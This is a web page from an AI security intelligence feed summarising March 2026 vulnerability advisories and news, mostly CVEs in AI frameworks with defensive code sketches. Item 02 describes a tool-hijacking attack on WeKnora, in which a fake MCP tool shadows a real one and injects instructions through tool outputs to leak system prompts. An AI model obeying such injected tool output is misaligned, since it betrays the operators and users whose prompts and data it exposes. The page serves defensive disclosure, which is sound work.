aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch is built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,669 · Last 24 hours: 19 · Last 7 days: 162
Daily Briefing · Monday, March 30, 2026

Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.


Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)
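The flaw class here is building a shell string from untrusted file content. A minimal Python sketch of the unsafe pattern and the argv-list alternative (illustrative only, not MLflow's actual code; function names are hypothetical):

```python
# Illustrative sketch, not MLflow's actual code. The flaw class:
# dependency strings read from an untrusted python_env.yaml are joined
# into a single shell command, so shell metacharacters become live syntax.

def build_shell_command_unsafe(deps: list[str]) -> str:
    # "requests; curl evil.sh | sh" would run verbatim when this string
    # is passed to subprocess.run(..., shell=True).
    return "pip install " + " ".join(deps)

def build_argv_safe(deps: list[str]) -> list[str]:
    # An argv list is never re-parsed by a shell, so metacharacters in a
    # dependency string stay inert arguments to pip (which then rejects
    # the malformed requirement instead of executing it).
    return ["pip", "install", *[str(d) for d in deps]]
```

The general rule: never interpolate file- or user-derived strings into a `shell=True` command; pass an argument list instead.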

Latest Intel

01

GHSA-2f4c-vrjq-rcgv: WeKnora has Broken Access Control - Cross-Tenant Data Exposure

security
Mar 6, 2026

WeKnora has a broken access control vulnerability (a security flaw where the application fails to properly check permissions) that lets any logged-in user from one tenant (a separate customer or organization) read sensitive data from other tenants' databases, including API keys (credentials for accessing external services), model configurations, and private messages. The problem happens because three database tables (messages, embeddings, models) are allowed to be queried but don't have automatic tenant filtering applied to them.
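One standard mitigation for this class of bug is to apply tenant scoping centrally rather than in each query. A hypothetical Python sketch (not WeKnora's code; table and field names invented):

```python
# Hypothetical sketch, not WeKnora's code: tables holding tenant-owned
# rows are listed once, and a central helper forces the tenant filter,
# so no individual query path can forget (or override) it.
TENANT_SCOPED_TABLES = {"messages", "embeddings", "models"}

def scoped_filters(table: str, session_tenant_id: int, filters: dict) -> dict:
    query = dict(filters)
    if table in TENANT_SCOPED_TABLES:
        # Overwrite any tenant_id the caller supplied; the session wins.
        query["tenant_id"] = session_tenant_id
    return query
```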

Critical This Week (5 issues)

critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379 · NVD/CVE Database · Mar 30, 2026
Daily Briefing (continued)

Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)
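The CrewAI RCE issues stem from silently falling back to a weaker sandbox when Docker containerization fails. A hedged sketch of the fail-closed alternative (hypothetical names, not CrewAI's API):

```python
# Hypothetical sketch, not CrewAI's API: when the strong sandbox is
# unavailable, fail closed unless the caller explicitly opts in to the
# weaker fallback, instead of degrading silently.
class SandboxUnavailableError(RuntimeError):
    pass

def pick_sandbox(docker_available: bool, allow_fallback: bool = False) -> str:
    if docker_available:
        return "docker"
    if allow_fallback:
        # Weaker isolation; acceptable only because the caller asked for it.
        return "restricted-subprocess"
    raise SandboxUnavailableError("Docker unavailable; refusing weaker sandbox")
```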


LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.
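Path traversal bugs of this kind are typically closed by resolving the requested path and checking containment. A generic Python sketch (not LangChain's actual patch):

```python
from pathlib import Path

# Generic mitigation sketch, not LangChain's actual patch: resolve the
# user-supplied path against a base directory and reject anything that
# escapes it (e.g. via "../" segments, absolute paths, or symlinks).
def resolve_safely(base_dir: str, user_path: str) -> Path:
    base = Path(base_dir).resolve()
    target = (base / user_path).resolve()
    if not target.is_relative_to(base):  # Path.is_relative_to needs Python 3.9+
        raise PermissionError(f"path escapes {base}")
    return target
```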

GitHub Advisory Database
02

GHSA-67q9-58vj-32qx: WeKnora Vulnerable to Tool Execution Hijacking via Ambiguous Naming Convention in MCP Client and Indirect Prompt Injection

security
Mar 6, 2026

WeKnora has a vulnerability where a malicious MCP server (a remote tool provider that integrates with AI clients) can hijack legitimate tools by exploiting how tool names are generated. An attacker registers a fake tool with the same name as a real one (like `tavily_extract`), which overwrites the legitimate version in the tool registry (the list of available tools). The attacker can then trick the LLM into executing their malicious tool and leak sensitive information like system prompts through prompt injection (hiding instructions in tool outputs that the AI treats as commands).

GitHub Advisory Database
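A common defense against this tool-shadowing pattern is to namespace tool names by origin server and refuse silent overwrites. A hypothetical sketch (not WeKnora's implementation):

```python
# Hypothetical sketch, not WeKnora's implementation: qualify each tool
# name with the server that registered it and reject duplicates, so a
# second server cannot silently shadow an existing "tavily_extract".
class ToolRegistry:
    def __init__(self) -> None:
        self._tools: dict = {}

    def register(self, server_id: str, tool_name: str, handler) -> str:
        qualified = f"{server_id}::{tool_name}"
        if qualified in self._tools:
            raise ValueError(f"duplicate tool registration: {qualified}")
        self._tools[qualified] = handler
        return qualified
```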
03

GHSA-ccj6-79j6-cq5q: WeKnora Vulnerable to Broken Access Control in Tenant Management

security
Mar 6, 2026

WeKnora has a broken access control vulnerability (BOLA, or broken object-level authorization, where an attacker can access resources they shouldn't by manipulating object IDs) in its tenant management system that allows any authenticated user to read, modify, or delete any tenant without permission checks. Since anyone can register an account, attackers can exploit this to take over or destroy other organizations' accounts and access their sensitive data like API keys.

GitHub Advisory Database
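BOLA is fixed by checking object ownership on every access, not just that the caller is logged in. A hypothetical sketch of such a check (invented field names, not WeKnora's code):

```python
# Hypothetical sketch, not WeKnora's code: object-level authorization
# means verifying the caller may touch the specific tenant named in the
# request, not merely that they hold a valid session.
def authorize_tenant_access(session_user: dict, target_tenant_id: int) -> None:
    if session_user.get("role") == "platform_admin":
        return  # platform operators may manage any tenant
    if session_user.get("tenant_id") != target_tenant_id:
        raise PermissionError("caller is not a member of the target tenant")
```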
04

Palantir rallies 15% for the week as Iran war boosts prospects, muting Anthropic concern

policyindustry
Mar 6, 2026

Palantir's stock rallied 15% this week after the U.S. attacked Iran, because the company relies on government spending for about 60% of its revenue and works heavily with military and intelligence agencies. Wall Street showed little concern about the U.S. government blacklisting Anthropic (an AI company that had partnered with Palantir on defense projects), as analysts noted there are alternative AI models available and that replacing Anthropic's systems will take time but is manageable.

CNBC Technology
05

GHSA-5f53-522j-j454: Flowise Missing Authentication on NVIDIA NIM Endpoints

security
Mar 6, 2026

Flowise incorrectly whitelisted the NVIDIA NIM router (`/api/v1/nvidia-nim/*`) in its authentication middleware, allowing anyone to access sensitive endpoints without logging in. This lets attackers steal NVIDIA API tokens, manipulate Docker containers, and mount denial-of-service attacks without needing valid credentials.

GitHub Advisory Database
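The underlying pattern is an authentication middleware with an allowlist of public routes, where one overly broad prefix exposes everything beneath it. A minimal Python sketch (hypothetical routes, not Flowise's middleware):

```python
# Hypothetical sketch, not Flowise's middleware: routes are private by
# default; only narrowly scoped prefixes are exempt from authentication.
# Adding a broad entry like "/api/v1/nvidia-nim/" would reopen the hole.
PUBLIC_PREFIXES = ("/healthz", "/api/v1/public/")

def requires_auth(path: str) -> bool:
    return not any(
        path == prefix or path.startswith(prefix) for prefix in PUBLIC_PREFIXES
    )
```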
06

GHSA-cwc3-p92j-g7qm: Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration

security
Mar 6, 2026

Flowise has a critical IDOR (insecure direct object reference, a flaw where an app trusts user input to identify which data to access without checking permissions) vulnerability in its login configuration endpoint. An attacker with a free account can modify any organization's single sign-on settings by simply specifying a different organization ID, enabling account takeover by redirecting logins to attacker-controlled credentials and bypassing enterprise license restrictions.

GitHub Advisory Database
07

GHSA-mq4r-h2gh-qv7x: Flowise Allows Mass Assignment in `/api/v1/leads` Endpoint

security
Mar 6, 2026

A mass assignment vulnerability (a flaw where an attacker sets internal, server-managed fields by including them in a request) exists in Flowise's `/api/v1/leads` endpoint, allowing unauthenticated users to override auto-generated fields like `id`, `createdDate`, and `chatId` by including them in the request body. The vulnerability occurs because the code uses `Object.assign()` to copy all properties from user input directly into the database entity without filtering, bypassing the intended auto-generation of these fields.

GitHub Advisory Database
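The standard fix for mass assignment is to copy an explicit allowlist of fields instead of everything the client sent. A Python analogue of the `Object.assign()` problem (hypothetical field names, not Flowise's schema):

```python
# Hypothetical sketch, a Python analogue of the Object.assign() issue:
# only client-writable fields are copied into the entity, so server-
# managed fields like id, createdDate, and chatId cannot be injected.
LEAD_WRITABLE_FIELDS = {"name", "email", "phone"}

def build_lead_entity(body: dict) -> dict:
    return {k: v for k, v in body.items() if k in LEAD_WRITABLE_FIELDS}
```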
08

Mayor Sadiq Khan invites embattled AI firm Anthropic to expand in London

policy
Mar 6, 2026

London Mayor Sadiq Khan invited AI company Anthropic to expand in the city after the U.S. Pentagon designated it a supply chain risk (a label meaning the government views the company as not secure enough to work with). The designation followed Anthropic's refusal to give defense agencies unrestricted access to its AI tools and its concerns about use of its Claude model for mass surveillance or autonomous military targeting. The company plans to challenge the Pentagon's designation in court, and Microsoft announced it would continue using Anthropic's technology except for the U.S. Department of Defense.

BBC Technology
09

CVE-2026-29791: Agentgateway is an open source data plane for agentic AI connectivity within or across any agent framework or environmen

security
Mar 6, 2026

Agentgateway is an open source data plane (a software layer that handles data movement for AI agents working across different frameworks). In versions before 0.12.0, user input in paths, query parameters, and headers was not properly sanitized when converting tool requests to OpenAPI format. This improper input validation (CWE-20, failing to check that data matches expected rules) could potentially be exploited; the vulnerability has been patched.

Fix: Update Agentgateway to version 0.12.0 or later to resolve the vulnerability.

NVD/CVE Database
10

Amazon says Anthropic’s Claude still OK for AWS customers to use outside defense work

policyindustry
Mar 6, 2026

Amazon announced that AWS customers can continue using Anthropic's Claude AI models for all work except Department of Defense projects, after the federal government labeled Anthropic a "supply chain risk." Anthropic says it will challenge this designation in court, and major cloud providers (Amazon, Microsoft, and Google) are helping customers transition to alternative AI models for defense-related work.

CNBC Technology
Critical This Week (continued)

critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873 · NVD/CVE Database · Mar 27, 2026

critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online · Mar 27, 2026

critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521 · CISA Known Exploited Vulnerabilities · Mar 26, 2026

critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputer · Mar 26, 2026